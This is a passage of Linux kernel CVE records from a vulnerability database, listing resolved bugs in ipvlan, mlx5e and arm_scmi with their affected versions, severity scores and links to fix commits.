"url": "https://git.kernel.org/stable/c/dd54b48db0c822ae7b520bc80751f0a0a173ef75"
},
{
"url": "https://git.kernel.org/stable/c/d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec"
},
{
"url": "https://git.kernel.org/stable/c/a44770fed86515eedb5a7c00b787f847ebb134a5"
},
{
"url": "https://git.kernel.org/stable/c/668b3074aa14829e2ac2759799537a93b60fef86"
},
{
"url": "https://git.kernel.org/stable/c/6af057ccdd8e7619960aca1f0428339f213b31cd"
},
{
"url": "https://git.kernel.org/stable/c/ff91059932401894e6c86341915615c5eb0eca48"
}
],
"title": "bpf, sockmap: Prevent lock inversion deadlock in map delete elem",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35895",
"datePublished": "2024-05-19T08:34:50.276Z",
"dateReserved": "2024-05-17T13:50:33.113Z",
"dateUpdated": "2025-05-04T09:07:50.310Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-33621 (GCVE-0-2024-33621)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipvlan: Dont Use skb->sk in ipvlan_process_v{4,6}_outbound
Raw packet from PF_PACKET socket ontop of an IPv6-backed ipvlan device will
hit WARN_ON_ONCE() in sk_mc_loop() through sch_direct_xmit() path.
WARNING: CPU: 2 PID: 0 at net/core/sock.c:775 sk_mc_loop+0x2d/0x70
Modules linked in: sch_netem ipvlan rfkill cirrus drm_shmem_helper sg drm_kms_helper
CPU: 2 PID: 0 Comm: swapper/2 Kdump: loaded Not tainted 6.9.0+ #279
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:sk_mc_loop+0x2d/0x70
Code: fa 0f 1f 44 00 00 65 0f b7 15 f7 96 a3 4f 31 c0 66 85 d2 75 26 48 85 ff 74 1c
RSP: 0018:ffffa9584015cd78 EFLAGS: 00010212
RAX: 0000000000000011 RBX: ffff91e585793e00 RCX: 0000000002c6a001
RDX: 0000000000000000 RSI: 0000000000000040 RDI: ffff91e589c0f000
RBP: ffff91e5855bd100 R08: 0000000000000000 R09: 3d00545216f43d00
R10: ffff91e584fdcc50 R11: 00000060dd8616f4 R12: ffff91e58132d000
R13: ffff91e584fdcc68 R14: ffff91e5869ce800 R15: ffff91e589c0f000
FS: 0000000000000000(0000) GS:ffff91e898100000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f788f7c44c0 CR3: 0000000008e1a000 CR4: 00000000000006f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<IRQ>
? __warn (kernel/panic.c:693)
? sk_mc_loop (net/core/sock.c:760)
? report_bug (lib/bug.c:201 lib/bug.c:219)
? handle_bug (arch/x86/kernel/traps.c:239)
? exc_invalid_op (arch/x86/kernel/traps.c:260 (discriminator 1))
? asm_exc_invalid_op (./arch/x86/include/asm/idtentry.h:621)
? sk_mc_loop (net/core/sock.c:760)
ip6_finish_output2 (net/ipv6/ip6_output.c:83 (discriminator 1))
? nf_hook_slow (net/netfilter/core.c:626)
ip6_finish_output (net/ipv6/ip6_output.c:222)
? __pfx_ip6_finish_output (net/ipv6/ip6_output.c:215)
ipvlan_xmit_mode_l3 (drivers/net/ipvlan/ipvlan_core.c:602) ipvlan
ipvlan_start_xmit (drivers/net/ipvlan/ipvlan_main.c:226) ipvlan
dev_hard_start_xmit (net/core/dev.c:3594)
sch_direct_xmit (net/sched/sch_generic.c:343)
__qdisc_run (net/sched/sch_generic.c:416)
net_tx_action (net/core/dev.c:5286)
handle_softirqs (kernel/softirq.c:555)
__irq_exit_rcu (kernel/softirq.c:589)
sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1043)
The warning triggers as this:
packet_sendmsg
packet_snd //skb->sk is packet sk
__dev_queue_xmit
__dev_xmit_skb //q->enqueue is not NULL
__qdisc_run
sch_direct_xmit
dev_hard_start_xmit
ipvlan_start_xmit
ipvlan_xmit_mode_l3 //l3 mode
ipvlan_process_outbound //vepa flag
ipvlan_process_v6_outbound
ip6_local_out
__ip6_finish_output
ip6_finish_output2 //multicast packet
sk_mc_loop //sk->sk_family is AF_PACKET
Call ip{6}_local_out() with NULL sk in ipvlan as other tunnels to fix this.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2ad7bf3638411cb547f2823df08166c13ab04269 Version: 2ad7bf3638411cb547f2823df08166c13ab04269 Version: 2ad7bf3638411cb547f2823df08166c13ab04269 Version: 2ad7bf3638411cb547f2823df08166c13ab04269 Version: 2ad7bf3638411cb547f2823df08166c13ab04269 Version: 2ad7bf3638411cb547f2823df08166c13ab04269 Version: 2ad7bf3638411cb547f2823df08166c13ab04269 Version: 2ad7bf3638411cb547f2823df08166c13ab04269 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:25.979Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0049a623dfbbb49888de7f0c2f33a582b5ead989"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54768bacfde60e8e4757968d79f8726711dd2cf5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1abbf079da59ef559d0ab4219d2a0302f7970761"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/183c4b416454b9983dc1b8aa0022b748911adc48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb53706a3403ba67f4040b2a82d9cf79e11b1a48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54213c09801e0bd2549ac42961093be36f65a7d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13c4543db34e0da5a7d2f550b6262d860f248381"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b3dc6e8003b500861fa307e9a3400c52e78e4d3a"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-33621",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:47.521739Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:46.366Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ipvlan/ipvlan_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0049a623dfbbb49888de7f0c2f33a582b5ead989",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
},
{
"lessThan": "54768bacfde60e8e4757968d79f8726711dd2cf5",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
},
{
"lessThan": "1abbf079da59ef559d0ab4219d2a0302f7970761",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
},
{
"lessThan": "183c4b416454b9983dc1b8aa0022b748911adc48",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
},
{
"lessThan": "cb53706a3403ba67f4040b2a82d9cf79e11b1a48",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
},
{
"lessThan": "54213c09801e0bd2549ac42961093be36f65a7d0",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
},
{
"lessThan": "13c4543db34e0da5a7d2f550b6262d860f248381",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
},
{
"lessThan": "b3dc6e8003b500861fa307e9a3400c52e78e4d3a",
"status": "affected",
"version": "2ad7bf3638411cb547f2823df08166c13ab04269",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ipvlan/ipvlan_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.19"
},
{
"lessThan": "3.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvlan: Dont Use skb-\u003esk in ipvlan_process_v{4,6}_outbound\n\nRaw packet from PF_PACKET socket ontop of an IPv6-backed ipvlan device will\nhit WARN_ON_ONCE() in sk_mc_loop() through sch_direct_xmit() path.\n\nWARNING: CPU: 2 PID: 0 at net/core/sock.c:775 sk_mc_loop+0x2d/0x70\nModules linked in: sch_netem ipvlan rfkill cirrus drm_shmem_helper sg drm_kms_helper\nCPU: 2 PID: 0 Comm: swapper/2 Kdump: loaded Not tainted 6.9.0+ #279\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nRIP: 0010:sk_mc_loop+0x2d/0x70\nCode: fa 0f 1f 44 00 00 65 0f b7 15 f7 96 a3 4f 31 c0 66 85 d2 75 26 48 85 ff 74 1c\nRSP: 0018:ffffa9584015cd78 EFLAGS: 00010212\nRAX: 0000000000000011 RBX: ffff91e585793e00 RCX: 0000000002c6a001\nRDX: 0000000000000000 RSI: 0000000000000040 RDI: ffff91e589c0f000\nRBP: ffff91e5855bd100 R08: 0000000000000000 R09: 3d00545216f43d00\nR10: ffff91e584fdcc50 R11: 00000060dd8616f4 R12: ffff91e58132d000\nR13: ffff91e584fdcc68 R14: ffff91e5869ce800 R15: ffff91e589c0f000\nFS: 0000000000000000(0000) GS:ffff91e898100000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f788f7c44c0 CR3: 0000000008e1a000 CR4: 00000000000006f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cIRQ\u003e\n ? __warn (kernel/panic.c:693)\n ? sk_mc_loop (net/core/sock.c:760)\n ? report_bug (lib/bug.c:201 lib/bug.c:219)\n ? handle_bug (arch/x86/kernel/traps.c:239)\n ? exc_invalid_op (arch/x86/kernel/traps.c:260 (discriminator 1))\n ? asm_exc_invalid_op (./arch/x86/include/asm/idtentry.h:621)\n ? sk_mc_loop (net/core/sock.c:760)\n ip6_finish_output2 (net/ipv6/ip6_output.c:83 (discriminator 1))\n ? nf_hook_slow (net/netfilter/core.c:626)\n ip6_finish_output (net/ipv6/ip6_output.c:222)\n ? __pfx_ip6_finish_output (net/ipv6/ip6_output.c:215)\n ipvlan_xmit_mode_l3 (drivers/net/ipvlan/ipvlan_core.c:602) ipvlan\n ipvlan_start_xmit (drivers/net/ipvlan/ipvlan_main.c:226) ipvlan\n dev_hard_start_xmit (net/core/dev.c:3594)\n sch_direct_xmit (net/sched/sch_generic.c:343)\n __qdisc_run (net/sched/sch_generic.c:416)\n net_tx_action (net/core/dev.c:5286)\n handle_softirqs (kernel/softirq.c:555)\n __irq_exit_rcu (kernel/softirq.c:589)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1043)\n\nThe warning triggers as this:\npacket_sendmsg\n packet_snd //skb-\u003esk is packet sk\n __dev_queue_xmit\n __dev_xmit_skb //q-\u003eenqueue is not NULL\n __qdisc_run\n sch_direct_xmit\n dev_hard_start_xmit\n ipvlan_start_xmit\n ipvlan_xmit_mode_l3 //l3 mode\n ipvlan_process_outbound //vepa flag\n ipvlan_process_v6_outbound\n ip6_local_out\n __ip6_finish_output\n ip6_finish_output2 //multicast packet\n sk_mc_loop //sk-\u003esk_family is AF_PACKET\n\nCall ip{6}_local_out() with NULL sk in ipvlan as other tunnels to fix this."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:11.634Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0049a623dfbbb49888de7f0c2f33a582b5ead989"
},
{
"url": "https://git.kernel.org/stable/c/54768bacfde60e8e4757968d79f8726711dd2cf5"
},
{
"url": "https://git.kernel.org/stable/c/1abbf079da59ef559d0ab4219d2a0302f7970761"
},
{
"url": "https://git.kernel.org/stable/c/183c4b416454b9983dc1b8aa0022b748911adc48"
},
{
"url": "https://git.kernel.org/stable/c/cb53706a3403ba67f4040b2a82d9cf79e11b1a48"
},
{
"url": "https://git.kernel.org/stable/c/54213c09801e0bd2549ac42961093be36f65a7d0"
},
{
"url": "https://git.kernel.org/stable/c/13c4543db34e0da5a7d2f550b6262d860f248381"
},
{
"url": "https://git.kernel.org/stable/c/b3dc6e8003b500861fa307e9a3400c52e78e4d3a"
}
],
"title": "ipvlan: Dont Use skb-\u003esk in ipvlan_process_v{4,6}_outbound",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-33621",
"datePublished": "2024-06-21T10:18:05.673Z",
"dateReserved": "2024-06-21T10:13:16.298Z",
"dateUpdated": "2025-11-04T17:20:25.979Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35835 (GCVE-0-2024-35835)
Vulnerability from cvelistv5
Published
2024-05-17 14:02
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: fix a double-free in arfs_create_groups
When `in` allocated by kvzalloc fails, arfs_create_groups will free
ft->g and return an error. However, arfs_create_table, the only caller of
arfs_create_groups, will hold this error and call to
mlx5e_destroy_flow_table, in which the ft->g will be freed again.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c Version: 1cabe6b0965ec067ac60e8f182f16d479a3b9a5c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35835",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T17:01:13.319923Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T21:08:42.977Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.621Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3d3ed8c152971dbe64c92c9ecb98fdb52abb629"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2501afe6c4c9829d03abe9a368b83d9ea1b611b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf116d9c3c2aebd653c2dfab5b10c278e9ec3ee5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c57ca114eb00e03274dd38108d07a3750fa3c056"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/42876db001bbea7558e8676d1019f08f9390addb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b21db3f1ab7967a81d6bbd328d28fe5a4c07a8a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66cc521a739ccd5da057a1cb3d6346c6d0e7619b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c6d5189246f590e4e1f167991558bdb72a4738b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e3d3ed8c152971dbe64c92c9ecb98fdb52abb629",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
},
{
"lessThan": "2501afe6c4c9829d03abe9a368b83d9ea1b611b7",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
},
{
"lessThan": "cf116d9c3c2aebd653c2dfab5b10c278e9ec3ee5",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
},
{
"lessThan": "c57ca114eb00e03274dd38108d07a3750fa3c056",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
},
{
"lessThan": "42876db001bbea7558e8676d1019f08f9390addb",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
},
{
"lessThan": "b21db3f1ab7967a81d6bbd328d28fe5a4c07a8a7",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
},
{
"lessThan": "66cc521a739ccd5da057a1cb3d6346c6d0e7619b",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
},
{
"lessThan": "3c6d5189246f590e4e1f167991558bdb72a4738b",
"status": "affected",
"version": "1cabe6b0965ec067ac60e8f182f16d479a3b9a5c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: fix a double-free in arfs_create_groups\n\nWhen `in` allocated by kvzalloc fails, arfs_create_groups will free\nft-\u003eg and return an error. However, arfs_create_table, the only caller of\narfs_create_groups, will hold this error and call to\nmlx5e_destroy_flow_table, in which the ft-\u003eg will be freed again."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:28.425Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e3d3ed8c152971dbe64c92c9ecb98fdb52abb629"
},
{
"url": "https://git.kernel.org/stable/c/2501afe6c4c9829d03abe9a368b83d9ea1b611b7"
},
{
"url": "https://git.kernel.org/stable/c/cf116d9c3c2aebd653c2dfab5b10c278e9ec3ee5"
},
{
"url": "https://git.kernel.org/stable/c/c57ca114eb00e03274dd38108d07a3750fa3c056"
},
{
"url": "https://git.kernel.org/stable/c/42876db001bbea7558e8676d1019f08f9390addb"
},
{
"url": "https://git.kernel.org/stable/c/b21db3f1ab7967a81d6bbd328d28fe5a4c07a8a7"
},
{
"url": "https://git.kernel.org/stable/c/66cc521a739ccd5da057a1cb3d6346c6d0e7619b"
},
{
"url": "https://git.kernel.org/stable/c/3c6d5189246f590e4e1f167991558bdb72a4738b"
}
],
"title": "net/mlx5e: fix a double-free in arfs_create_groups",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35835",
"datePublished": "2024-05-17T14:02:23.469Z",
"dateReserved": "2024-05-17T13:50:33.103Z",
"dateUpdated": "2025-05-04T09:06:28.425Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48655 (GCVE-0-2022-48655)
Vulnerability from cvelistv5
Published
2024-04-28 13:01
Modified
2025-05-04 08:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Harden accesses to the reset domains
Accessing reset domains descriptors by the index upon the SCMI drivers
requests through the SCMI reset operations interface can potentially
lead to out-of-bound violations if the SCMI driver misbehave.
Add an internal consistency check before any such domains descriptors
accesses.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "7184491fc515",
"status": "affected",
"version": "95a15d80aa0d",
"versionType": "custom"
},
{
"lessThan": "f2277d9e2a0d",
"status": "affected",
"version": "95a15d80aa0d",
"versionType": "custom"
},
{
"lessThan": "1f08a1b26cfc",
"status": "affected",
"version": "95a15d80aa0d",
"versionType": "custom"
},
{
"lessThan": "8e65edf0d376",
"status": "affected",
"version": "95a15d80aa0d",
"versionType": "custom"
},
{
"lessThan": "e9076ffbcaed",
"status": "affected",
"version": "95a15d80aa0d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.4:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.4"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-48655",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-05T04:01:14.973732Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125 Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
